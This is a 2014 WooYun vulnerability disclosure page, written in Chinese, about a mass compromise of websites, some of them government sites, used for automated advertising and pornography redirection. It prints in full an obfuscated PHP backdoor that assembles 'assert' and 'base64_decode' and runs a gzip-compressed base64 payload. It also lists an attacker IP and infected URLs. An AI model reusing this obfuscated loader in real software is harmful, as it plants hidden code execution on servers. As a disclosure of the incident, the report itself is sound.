当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087519

漏洞标题:高级自动化黑产大揭秘(附部分广告推送代码分析)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-12-17 17:51

修复时间:2015-01-31 17:52

公开时间:2015-01-31 17:52

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-22: 厂商已经确认,细节仅向厂商公开
2015-01-01: 细节向核心白帽子及相关领域专家公开
2015-01-11: 细节向普通白帽子公开
2015-01-21: 细节向实习白帽子公开
2015-01-31: 细节向公众公开

简要描述:

大量网站遭到挂马,高级黑产

详细说明:

百度搜 http://222.186.12.144:8888/
http://www.baidu.com/s?wd=http%3A%2F%2F222.186.12.144%3A8888%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&oq=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5&inputT=799&rsv_pq=85d5d28100007683&rsv_t=022cQ4rxhIN8l4PiN1qvrX3GHzbAFvPglZ9yczNixGk6kNE2iZFnRkaYpCLDsZ5Y%2F0SY&rsv_n=2&rsv_sug3=16&rsv_sug4=586&rsv_sug1=16&rsv_sug=1&bs=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5%E4%B8%AD%E5%BF%83

1.png


http://gxlyjt.com/index.php?gxlyjt=130&wap=1
http://www.cqwswsjds.com/index.php/Content/index/type/85.html?cqwswsjds=1661
http://www.cqkxajj.gov.cn/index.php/Content/index/type/209.html?gov=748
政府网站还是挺多的
这是我检测服务器的时候发现的 在php 发现了一段意外的代码

$dw_dir = "";
$dw_gb = 1; 
$dw_dan = 0;
    $_MYSQL = /*dbname*/"as"/*-ip-*/."s";
    $SQL_STMTLY = /*stmt*/"b"."a"./*-$mysql_*/"se";
    $_MYSQL = $_MYSQL ."ert";
    $GETIPNAME = "abcdefghicklmnopqrst";
    $SQL_STMTLY = $SQL_STMTLY./*stmt-*/"64_"./*stmt*/"de"/*d**e*d*e8d**e**/."code";
    $SQL_CONNECT_STRS = $SQL_STMTLY;
    $GETIPNAMEy = "gz_".substr( $SQL_STMTLY, 7,6);
    $SQL_CONNECT_STRSectstr = "ZnVuY3Rpb24gZ3pfZGVjb2RlKCRkYXRhKXskZmxhZ3MgPSBvcmQoc3Vic3RyKCRkYXRhLCAzLCAxKSk7JGhlYWRlcmxlbiA9IDEwOyRleHRyYWxlbiA9IDA7JGZpbGVuYW1lbGVuID0gMDtpZiAoJGZsYWdzICYgNCkgeyRleHRyYWxlbiA9IHVucGFjaygndicgLHN1YnN0cigkZGF0YSwgMTAsIDIpKTskZXh0cmFsZW4gPSAkZXh0cmFsZW5bMV07JGhlYWRlcmxlbiArPSAyICsgJGV4dHJhbGVuO31pZiAoJGZsYWdzICYgOCkkaGVhZGVybGVuID0gc3RycG9zKCRkYXRhLCBjaHIoMCksICRoZWFkZXJsZW4pICsgMTtpZiAoJGZsYWdzICYgMTYpJGhlYWRlcmxlbiA9IHN0cnBvcygkZGF0YSwgY2hyKDApLCAkaGVhZGVybGVuKSArIDE7aWYgKCRmbGFncyAmIDIpJGhlYWRlcmxlbiArPSAyOyR1bnBhY2tlZCA9IEBnemluZmxhdGUoc3Vic3RyKCRkYXRhLCAkaGVhZGVybGVuKSk7aWYgKCR1bnBhY2tlZCA9PT0gRkFMU0UpJHVucGFja2VkID0gJGRhdGE7cmV0dXJuICR1bnBhY2tlZDt9DQo=";
    $IPADDRESS = $SQL_CONNECT_STRS(( $SQL_CONNECT_STRSectstr ));
    $MYSQL_CONNECTLY = $_MYSQL;
    $SQL_CONNECT_STRSECT = $SQL_STMTLY[3]./*ly**/"v".$SQL_STMTLY[1].$GETIPNAME[11]."( ".$GETIPNAMEy."($SQL_CONNECT_STRS('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')));";
    @$MYSQL_CONNECTLY( $SQL_CONNECT_STRSECT.$IPADDRESS );


漏洞证明:

2.jpg


包括色情网站的推广

3.jpg


当你访问那些链接的时候,除了跳转推广的网站外,貌似还更新下发任务,实现全自动了
在cache 目录下发现了大量的文件
每个文件夹差不多6-15万个文件不等 大约有1万多个文化夹
应该是下发的任务

QQ图片20141217153208.jpg


部分代码:
http://drops.wooyun.org/wp-content/uploads/2014/12/AD_PUSH.zip

修复方案:

他们比我懂

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-22 14:54

厂商回复:

最新状态:

暂无